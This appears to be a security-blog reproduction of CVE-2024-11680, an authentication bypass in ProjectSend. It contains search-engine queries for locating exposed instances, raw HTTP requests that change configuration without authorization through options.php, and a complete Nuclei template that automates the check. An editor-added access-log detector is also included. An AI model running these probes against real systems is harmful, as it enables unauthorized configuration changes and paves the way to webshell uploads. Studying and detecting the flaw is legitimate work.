【漏洞复现】CVE-2024-11680


混子Hacker 2024-12-02 12:36


Disclaimer

Do not use the techniques described in this article for illegal testing. Any direct or indirect consequences or losses arising from the dissemination or use of the information or tools provided here are the sole responsibility of the user; the author assumes no legal or joint liability.

Vulnerability Overview

"Life is long, with sun and rain alike, but with passion in your heart, even through barren years you can run to the mountains and the sea and quietly await a tree in bloom." (quoted from People's Daily)

CVE-2024-11680

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. A remote, unauthenticated attacker can exploit the flaw by sending a crafted HTTP request to options.php, modifying the application's configuration without authorization. Successful exploitation allows the attacker to create accounts, upload webshells, and embed malicious JavaScript.

Vulnerability Information

01 Asset Mapping

fofa: body="ProjectSend"
Quake:body:"ProjectSend"

02 Vulnerability Reproduction

1. Visit the site to obtain the csrf_token and session cookie, and note the current title value.

GET / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Connection: close
Accept-Encoding: gzip

2. Send the cookie and csrf_token to options.php to change the title; a 500 response may indicate that the vulnerability is present.

POST /options.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip
csrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428&section=general&this_install_title=2pei9Dunmem7Jdkj6PbVXS13glW

3. Visit the home page to check whether the change took effect: the value after "Log in »" in the title has been replaced with the value we set.

GET / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Connection: close
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip

4. After the change, remember to send the original value back to options.php so the site's normal operation is not affected; visiting the home page then shows the original title restored.

POST /options.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip
csrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428&section=general&this_install_title=2peHaMAlgDO7f4j4cx0MtyyqdxO
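From the defender's side, the probe above leaves a distinctive trace in the web server access log: a POST to /options.php answered with 500 (the response the write-up reports for the unauthenticated code path), from a client that never opened the settings form with GET. The following detector is an added example by the editor, not code from the original post or from ProjectSend; the log lines are constructed, and the "no prior GET of the form" rule is a heuristic assumption about how a legitimate admin save looks.

```python
import re
from collections import defaultdict

# Combined log format: client, timestamp, request line, status, size, referer, user-agent
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not real traffic). The first client replays the
# GET / -> POST /options.php (500) -> GET / sequence from the write-up; the second
# is an admin who opened the settings page before saving it.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Dec/2024:12:30:01 +0800] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Dec/2024:12:30:02 +0800] "POST /options.php HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Dec/2024:12:30:03 +0800] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Dec/2024:12:31:10 +0800] "GET /options.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Dec/2024:12:31:15 +0800] "POST /options.php HTTP/1.1" 302 0 "http://host/options.php" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_options_abuse(log_text):
    """Return (ip, timestamp, reason) for each POST to /options.php that looks unauthenticated.

    Two heuristic signals: a 500 response, which the write-up reports for the
    unauthenticated path, or a client that never fetched /options.php with GET
    earlier in the log, so the settings form was never rendered to it.
    """
    seen_get_options = defaultdict(bool)
    hits = []
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        path = e["path"].split("?", 1)[0]  # ignore any query string
        if path != "/options.php":
            continue
        if e["method"] == "GET":
            seen_get_options[e["ip"]] = True
        elif e["method"] == "POST":
            if e["status"] == "500":
                hits.append((e["ip"], e["ts"], "POST /options.php returned 500"))
            elif not seen_get_options[e["ip"]]:
                hits.append((e["ip"], e["ts"], "POST /options.php without prior GET of the form"))
    return hits

if __name__ == "__main__":
    for ip, ts, why in find_options_abuse(SAMPLE_LOG):
        print(f"{ts} {ip}: {why}")
```

Any hit from a version before r1720 is a reason to check the site title, registration settings and allowed-extension whitelist for unauthorized changes, and to upgrade.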

03 Nuclei PoC

id: projectsend-auth-bypass
info:
  name: ProjectSend <= r1605 - Improper Authorization
  author: DhiyaneshDK
  severity: high
  description: |
    An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
  reference:
    - https://www.projectsend.org/
    - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="ProjectSend"
    shodan-query: html:"ProjectSend"
  tags: misconfig,projectsend,auth-bypass,intrusive
variables:
  string: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "projectsend")'
        condition: and
        internal: true
    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="csrf_token" value="([0-9a-z]+)"'
        internal: true
      - type: regex
        name: title
        group: 1
        regex:
          - '<title>Log in &raquo; ([0-9a-zA-Z]+)<\/title>'
        internal: true
  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        csrf_token={{csrf}}&section=general&this_install_title={{string}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
        internal: true
  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        csrf_token={{csrf}}&section=general&this_install_title={{title}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{title}}")'
        condition: and
# If the PoC fails to run, try downloading the latest nuclei release


Original article | please include a link to the source when reposting

More vulnerabilities | follow the author

Author | 混子Hacker